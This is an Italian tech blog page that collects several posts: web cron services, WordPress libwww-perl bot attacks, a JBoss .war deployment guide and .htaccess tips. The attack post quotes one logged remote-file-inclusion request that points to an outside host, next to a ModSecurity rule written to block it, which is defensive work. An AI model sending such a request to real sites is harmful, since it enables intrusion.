Crontab (unix) e Task Scheduler (win) sono comandi che permettono di eseguire a loro volta lo scheduling ovvero l'esecuzione periodica di eventuali altri comandi o applicazioni. Cron è come una sveglia per il server in un certo senso ed è molto utile per quanto riguarda la manutenzione e il backup di dati, ma non solo.

 

 

photo credit

 

Oltre al demone cron per unix c'é anche fcron, mentre per windows ho trovato pycron. Entrambi assolutamente gratuiti. Disponendo, inoltre, di una connessione internet e utilizzando wget con uno di questi due programmi è possibile eseguire script o altro presente nel web.

 

 

La stessa cosa è possibile farla con alcuni utili servizi web-based che permettono appunto di eseguire dei comandi a intervalli di tempo regolari determinati come ping, aggiornamenti di un blog, backup, mailinglist temporizzate, sitemap, l'esecuzione di algoritmi, script e quant'altro vi venga in mente.

 

Alcuni di essi sono a pagamento altri sono gratutiti.

Nome	Prezzi	Account gratuiti	Lingua
Cron Service	4.95EUR/anno		NL
WebCron.org	n/a	si	FR
Web Service Scheduler	$11.88/anno	si	EN
WebbasedCron	$19.95/anno	trial	EN
CronService	$19.95/anno	trial	EN
Onlinecron	n/a	si	FR
Cronjob.de	2.99EUR/mese	trial	DE
cronjobs.org	n/a	si	EN
cronjobs.com	5EUR/mese		DE
HostedCron	$10/mese		EN
web-cron.org	30EUR/?		FR
Cron-Jobs.com	1.02EUR/mese		DE
Webgrid Scheduler	n/a	si	EN
crontastic.com	?	beta	EN
Onlinecronjobs.com	n/a	si	EN/RO

 

Tra tutti i cron web-based gratuiti al momento da me provati: webcron, webgrid scheduler e onlineconjobs il migliore è risultato essere onlinecronjobs in lingua inglese e romena.

 

www.onlinecronjobs.com

 

Registrazione gratuita e nel momento in cui vi parlo, un numero illimitato di cronjobs.

Donncha ha rilasciato un post dal titolo "tenere lontani i libwww-perl bot " usando il mod_rewrite e bloccando lo HTTP_USER_AGENT per prevenire attacchi. Questo comunque non sembra funzionare. Il perché è presto detto, E' semplice cambiare la stringa dello HTTP_USER_AGENT e l'attacco che si potrebbe verificare potrebbe non usare una stringa relativa allo user-agent standard quale libwww-perl user-agent . Inoltre, le possibilità che delegittimiate la lettura del vostro feed e di altri strumenti web che hanno accesso al vostro blog sono davvero tante. Donncha’s mostra un esempio di questo attacco:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? …
“libwww-perl/5.805″

Questa richiesta sembrerebbe provare ad eseguire l'exploit tramite un RFI (Remote File Inclusion vulnerability) . Ma a quanto confermano BlogWatch e altri non sembrerebberi esserci vulnerabilità del genere sulla piattaforma Wordpress al momento. Potrei pensare ad un bug nei vari themes/templates oppure nei plugin installati e disponibili online ma sul solo wp e sul file incriminato wp-pass.php non sembrano esserci bugs di questo tipo. Alcune regole per tenere lontani questi bot potete trovarle all'interno di questa pagina Comunque un altro modo per poter prevenire gli attacchi potrebbe avvenire attraverso l'uso di un firewall per Apache open source chiamato ModSecurity. La regola, poi, dovrebbe essere la seguente:

SecFilterSelective REQUEST_URI "wp-pass.php?_wp_http_referer"

Naturalmente se dipendete da librerie libwww-perl non usate queste regole altrimenti potreste ritrovarvi con il blog non più funzionante.

Riporto una spiegazione efficace del problema lasciata da @navigatore anonimo proprio sul sito di antirez che ha subito tra gli altri l'attacco:

 

"in sostanza (IMHO) l'attacco può essere portato se si ha già il controllo di uno o più hub : in quel caso lo status di operatore dovrebbe garantire la possibilità di aggiungere altri hubs ; ciò che ha fatto questo "operatore" è inserire nomedelsito.com nella lista degli hubs di dc++ con la conseguenza che i client collegati al suo/ ai suoi hub(s) hanno iniziato a inoltrare richieste verso nomedelsito.com : le versioni precedenti del client non è che siano buggati nel senso stretto della parola ;

(continua a leggere...)

Trovandomi con un amico sotto tesi ci siamo imbattuti in jboss e nei file .war
Ecco il procedimento da eseguire per creare e deployare un file .war

1) Creare la cartella prova

2) mettere dentro prova le dir META-INF e WEB-INF (createle se non esistono ) e i file .jsp o html.

2-a) META-INF/
        -MANIFEST.MF

2-b) WEB-INF/
web.xml
jboss-web.xml

3) Apriamo la shell di comando
4) Portarsi nella directory prova da shell di comando
5) Digitare :
                        jar cvf nomdelfile.jar *

(nel nostro caso prova.jar)

5-end)Verranno inclusi nel jar i file presenti nella dir prova.

6) Rinominare il file .jar creato in .war
7) Copiare il file .war nella cartella /default/deploy/

Il deployment non dovrebbe dare errori.


Verificare che il file venga deployato senza errori.

Se compare l'errore di missing web.xml nel deployment
etc etc andare verificare d'aver creato correttamente
il file .jar (creato in precedenza);

powered by performancing firefox

Abilitare Navigabilit� Directory

Options +Indexes## blocca la visualizzazione di alcuni tipi di file IndexIgnore *.wmv *.mp4 *.avi

Disabilitare Navigabilit� Directory

Options All -Indexes

Customizzare i Messaggi di errore

ErrorDocument 403 /forbidden.htmlErrorDocument 404 /notfound.htmlErrorDocument 500 /servererror.html

Rendere SSI funzionale con HTML/SHTML AddType text/html .html AddType text/html .shtml AddHandler server-parsed .html AddHandler server-parsed .shtml # AddHandler server-parsed .htm Cambiare la pagina di default (order is followed!) DirectoryIndex myhome.htm index.htm index.php Bloccare l’acceso al sito agli Utenti <limit GET POST PUT> order deny,allow deny from 202.54.122.33 deny from 8.70.44.53 deny from .spammers.com allow from all </limit> Permettere solo utenti della Lan order deny,allow deny from all allow from 192.168.0.0/24 Redirettare Visitatori su una nuova Pagina/Directory Redirect oldpage.html http://www.domainname.com/newpage.html Redirect /olddir http://www.domainname.com/newdir/ Bloccare sito da specifici referrers RewriteEngine on RewriteCond %{HTTP_REFERER} site-to-block\.com [NC] RewriteCond %{HTTP_REFERER} site-to-block-2\.com [NC] RewriteRule .* - [F] Bloccare Hot Linking/Bandwidth hogging RewriteEngine on RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?mydomain.com/.*$ [NC] RewriteRule \.(gif|jpg)$ - [F] Mostrare un messaggio “Rubare non è Bello!!!!” ? Aggiungere un Hot Link Blocking code: RewriteRule \.(gif|jpg)$ http://www.mydomain.com/nonrubare.gif [R,L] Fermare .htaccess (o qualsiasi altro file) dalla possibiltÃ� di essere visionato <files file-name> order allow,deny deny from all </files> Evitare l'errore 500 # Avoid 500 error by passing charset AddDefaultCharset utf-8 Cambiare l’estensione dello script AddType application/x-httpd-php .gne gne sar� trattato come file php! Allo stesso modo x-httpd-cgi per i files CGI, etc. Usare Digests MD5 Performance may take a hit but if thats not a problem, this is a nice option to turn on. ContentDigest On La Direttiva CheckSpelling CheckSpelling corregge alcuni piccoli errori di spelling (per esempio, se qualcuniodimentica una lettera di un carattere) . Basta aggiungere CheckSpelling On nel file .htaccess. Salvare Banda # Solo se si usa PHP <ifmodule mod_php4.c> php_value zlib.output_compression 16386 </ifmodule> Disabilitare magic_quotes_gpc # Solo se si usa PHP <ifmodule mod_php4.c> php_flag magic_quotes_gpc off </ifmodule>